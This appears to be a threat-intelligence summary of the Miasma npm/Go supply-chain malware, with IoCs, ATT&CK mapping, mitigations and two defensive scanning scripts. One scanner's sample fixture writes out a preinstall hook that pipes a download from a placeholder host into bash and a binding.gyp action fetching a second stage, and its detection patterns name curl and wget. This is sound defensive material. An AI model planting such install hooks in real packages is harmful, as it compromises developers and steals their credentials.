Full Report
Cybersecurity researchers have flagged yet another evolution of the supply chain attack linked to the Mini Shai-Hulud, Miasma, and Hades malware family that has compromised a new set of npm packages, even as it has propagated to the Go ecosystem. "The latest activity includes malicious npm releases affecting LeoPlatform and RStreams packages, GitHub Actions workflow abuse, and a related Go
Analysis Summary
# Tool/Technique: Miasma (Mini Shai-Hulud / Hades Family)
## Overview
Miasma is a sophisticated malware family involved in multi-ecosystem supply chain attacks. It primarily targets developers by poisoning package registries (npm, PyPI, Go) to harvest credentials, GitHub tokens, and CI/CD secrets. The goal is to weaponize stolen data to propagate further across trusted developer workflows and repositories.
## Technical Details
- **Type:** Malware family / Infostealer
- **Platform:** Cross-platform (JavaScript/Node.js, Go, Python, Linux/macOS/Windows)
- **Capabilities:** Credential harvesting, CI/CD secret theft, automated propagation, environment fingerprinting.
- **First Seen:** June 2026 (Reflecting the provided article date)
## MITRE ATT&CK Mapping
- **[TA0001 - Initial Access]**
  - [T1195.001 - Supply Chain Compromise: Compromise Software Dependencies]
- **[TA0003 - Persistence]**
  - [T1133 - External Remote Services (via stolen tokens)]
- **[TA0006 - Credential Access]**
  - [T1552.001 - Unsecured Credentials: Credentials In Files]
  - [T1555 - Credentials from Password Stores]
- **[TA0007 - Discovery]**
  - [T1614.001 - System Location Discovery: System Language Discovery]
- **[TA0010 - Exfiltration]**
  - [T1567.001 - Exfiltration Over Web Service: Exfiltration to Code Repository]
## Functionality
### Core Capabilities
- **Registry Poisoning:** Uploads trojanized versions of popular packages (e.g., LeoPlatform, RStreams) using compromised maintainer tokens.
- **Credential Theft:** Scans local environments for AWS keys, npm tokens, GitHub Personal Access Tokens (PATs), and OIDC tokens.
- **Install-Time Execution:** Uses `binding.gyp` or `package.json` lifecycle hooks to execute malicious scripts immediately upon package download.
- **Dead-Drop Resolvers:** Uses GitHub repository descriptions (e.g., "Alright Lets See If This Works") as a mechanism to coordinate or relay stolen data.
### Advanced Features
- **CI/CD Hijacking:** Specifically targets GitHub Actions runners to scrape secrets directly from memory.
- **Language Killswitch:** Features a locale check (Russian) to avoid execution on systems in specific geographic regions.
- **Persistence via Developer Tools:** Attempts to establish persistence within IDEs and AI coding assistants.
- **Automated Worm-like Propagation:** When a GitHub Action is compromised, the malware attempts to push malicious commits to other repositories accessible via the stolen credentials.
## Indicators of Compromise
- **File Names:** `binding.gyp` (maliciously modified), "Run Copilot" (malicious GitHub Action workflow).
- **Network Indicators:**
  - `github[.]com/verana-labs/verana-blockchain` (Compromised Go module)
  - Public GitHub repositories with the description: "Alright Lets See If This Works"
- **Behavioral Indicators:**
  - Deployment of Bun runtime during npm package installation.
  - Unexpected `git push` or `git commit` actions from GitHub Action runners.
  - Encryption of local files using AES-128-GCM before exfiltration.
  - Strings: `RevokeAndItGoesKaboom`, `IfYouInvalidateThisTokenItWillNukeTheComputerOfTheOwner`.
## Associated Threat Actors
- Unknown (Current research links the activity to a specific operational cluster targeting the JavaScript and Go ecosystems).
## Detection Methods
- **Signature-based:** Scan for the unique strings "RevokeAndItGoesKaboom" and "Alright Lets See If This Works" within CI/CD logs and repository descriptions.
- **Behavioral:** Monitor for `binding.gyp` scripts that initiate network connections or download external runtimes (like Bun) during `npm install`.
- **YARA:** Create rules targeting the specific JavaScript loader patterns used to fetch the second-stage payload.
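The install-time execution capability described under Functionality (lifecycle hooks and `binding.gyp`) and the behavioral and signature detections listed above can be checked together with a small static scanner run over an extracted npm tarball or a `node_modules` tree before installation. The following is an added example written for this summary, not tooling from the report or from any vendor: it flags `package.json` lifecycle hooks that reach the network or pull in an external runtime such as Bun, `binding.gyp` files that declare build-time `actions` (which node-gyp executes as commands), and the marker strings quoted in the IoC list. The heuristic patterns, the `example.invalid` URLs and the sample packages built in `demo()` are all constructed for illustration.

```python
import json
import os
import re
import tempfile
from typing import Dict, List

# npm runs these package.json scripts automatically during `npm install`.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Heuristic patterns (assumed, not from the report) suggesting a hook reaches the
# network or drops an external runtime during installation.
SUSPICIOUS_PATTERNS = [
    re.compile(r"\b(curl|wget)\b"),
    re.compile(r"\bbun\b"),          # Bun runtime deployed at install time (report IoC)
    re.compile(r"\bnode\s+-e\b"),    # inline JavaScript evaluation
    re.compile(r"https?://"),
]

# Marker strings quoted in the report's IoC list.
MARKER_STRINGS = (
    "RevokeAndItGoesKaboom",
    "IfYouInvalidateThisTokenItWillNukeTheComputerOfTheOwner",
    "Alright Lets See If This Works",
)


def scan_package_json(text: str) -> List[str]:
    """Flag lifecycle hooks in a package.json body that match a suspicious pattern."""
    try:
        manifest = json.loads(text)
    except json.JSONDecodeError:
        return ["package.json: unparseable JSON"]
    scripts = manifest.get("scripts", {})
    findings: List[str] = []
    if not isinstance(scripts, dict):
        return findings
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        for pat in SUSPICIOUS_PATTERNS:
            if pat.search(cmd):
                findings.append(f"package.json: {hook} hook matches {pat.pattern!r}: {cmd}")
                break
    return findings


def scan_binding_gyp(text: str) -> List[str]:
    """Flag binding.gyp files that declare build-time 'actions' (node-gyp runs them as commands)."""
    findings = []
    if re.search(r"['\"]actions['\"]\s*:", text):
        findings.append("binding.gyp: declares build-time 'actions' (command execution)")
    for pat in SUSPICIOUS_PATTERNS:
        if pat.search(text):
            findings.append(f"binding.gyp: matches {pat.pattern!r}")
            break
    return findings


def scan_markers(path: str, text: str) -> List[str]:
    """Report any known marker string found in a file (also usable on CI logs)."""
    return [f"{path}: contains marker string {m!r}" for m in MARKER_STRINGS if m in text]


def scan_tree(root: str) -> Dict[str, List[str]]:
    """Walk an extracted package or node_modules tree; return {relative path: findings}."""
    report: Dict[str, List[str]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            try:
                with open(full, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue
            findings = scan_markers(rel, text)
            if name == "package.json":
                findings += scan_package_json(text)
            elif name == "binding.gyp":
                findings += scan_binding_gyp(text)
            if findings:
                report[rel] = findings
    return report


def demo() -> Dict[str, List[str]]:
    """Build a constructed sample tree (one benign, one suspicious package) and scan it."""
    root = tempfile.mkdtemp(prefix="npm-scan-")
    samples = {  # constructed sample files, not real packages
        "benign/package.json": json.dumps({"name": "benign-lib", "version": "1.0.0",
            "scripts": {"test": "jest", "postinstall": "node scripts/setup.js"}}),
        "suspicious/package.json": json.dumps({"name": "example-lib", "version": "9.9.9",
            "scripts": {"preinstall": "curl -fsSL https://example.invalid/b.sh | bash && bun run loader.js"}}),
        "suspicious/binding.gyp": (
            "{'targets': [{'target_name': 'noop',\n"
            "  'actions': [{'action_name': 'fetch', 'inputs': [], 'outputs': ['x'],\n"
            "    'action': ['node', 'fetch.js', 'https://example.invalid/stage2']}]}]}\n"),
    }
    for rel, body in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return scan_tree(root)
```

Running `demo()` reports the suspicious package's `preinstall` hook and its `binding.gyp`, and nothing for the benign package. In practice the scan is most useful as a pre-install gate (`npm pack` the dependency, extract, scan, then install) and as a periodic sweep of build caches; the pattern list is deliberately small and should be tuned to the organisation's own build conventions to keep false positives manageable.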
## Mitigation Strategies
- **Namespace Contention:** Use private registries or scoped packages to prevent dependency confusion.
- **Credential Hygiene:** Enable Multi-Factor Authentication (MFA) for all package registry accounts (npm, PyPI) and use short-lived OIDC tokens instead of long-lived PATs in CI/CD.
- **Action Pinning:** Pin GitHub Actions to specific full-length commit SHA-1 hashes rather than tags (which can be moved by an attacker).
- **Network Egress Filtering:** Restrict the ability of CI/CD runners to communicate with arbitrary external domains.
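The action-pinning mitigation above is easy to enforce mechanically. The following is an added example, not from the report or from GitHub: a line-oriented check over a workflow file that flags every `uses:` reference not pinned to a full 40-character commit SHA, treating local actions (`./...`) and `docker://` images pinned by sha256 digest as acceptable. It reads the YAML with a regular expression rather than a YAML parser so it runs with the standard library only; the `SAMPLE_WORKFLOW`, its action names and the 40-hex SHA in it are constructed placeholders.

```python
import re
from typing import List, NamedTuple

# Matches `uses:` lines in a workflow, with or without a leading list dash.
USES_RE = re.compile(r"^\s*-?\s*uses:\s*['\"]?([^\s'\"#]+)")
FULL_SHA_RE = re.compile(r"^[0-9a-f]{40}$")
DIGEST_RE = re.compile(r"^sha256:[0-9a-f]{64}$")


class Finding(NamedTuple):
    line_no: int
    ref: str
    reason: str


def classify_uses(ref: str) -> str:
    """Return 'ok' for an immutably pinned reference, otherwise the reason it is not."""
    if ref.startswith("./"):
        return "ok"  # local action: already fixed by the commit being checked out
    if ref.startswith("docker://"):
        image = ref[len("docker://"):]
        if "@" in image and DIGEST_RE.match(image.split("@", 1)[1]):
            return "ok"
        return "docker image not pinned by sha256 digest"
    if "@" not in ref:
        return "no ref given (resolves to the action repo's default branch)"
    version = ref.rsplit("@", 1)[1]
    if FULL_SHA_RE.match(version):
        return "ok"
    if re.fullmatch(r"[0-9a-f]{7,39}", version):
        return "abbreviated SHA; use the full 40-character commit SHA"
    return f"mutable ref {version!r} (a tag or branch can be moved)"


def check_workflow(text: str) -> List[Finding]:
    """Scan workflow YAML text line by line and return every unpinned `uses:` reference."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = USES_RE.match(line)
        if m:
            reason = classify_uses(m.group(1))
            if reason != "ok":
                findings.append(Finding(n, m.group(1), reason))
    return findings


# Constructed sample workflow (not from the report); the SHA below is a placeholder.
SAMPLE_WORKFLOW = """name: ci
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@0123456789abcdef0123456789abcdef01234567 # v3.8.2 (placeholder SHA)
      - uses: ./.github/actions/local-thing
      - name: Deploy
        uses: some-org/some-action@main
      - uses: docker://alpine:3.19
"""


def demo() -> List[Finding]:
    """Run the check over the constructed sample workflow."""
    return check_workflow(SAMPLE_WORKFLOW)


if __name__ == "__main__":
    for f in demo():
        print(f"line {f.line_no}: {f.ref} -> {f.reason}")
```

On the sample this reports lines 7, 11 and 12 (the `v4` tag, the `main` branch and the untagged Docker image) and accepts the SHA-pinned and local references. Keeping the human-readable version as a trailing comment, as on line 8, preserves readability while the SHA is what actually gets resolved; a check like this belongs in pre-commit hooks or a required status check so that new unpinned references cannot land.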
## Related Tools/Techniques
- **Mini Shai-Hulud / Hades:** Earlier variants of the same malware lineage.
- **Typosquatting:** Similar distribution method often used alongside registry poisoning.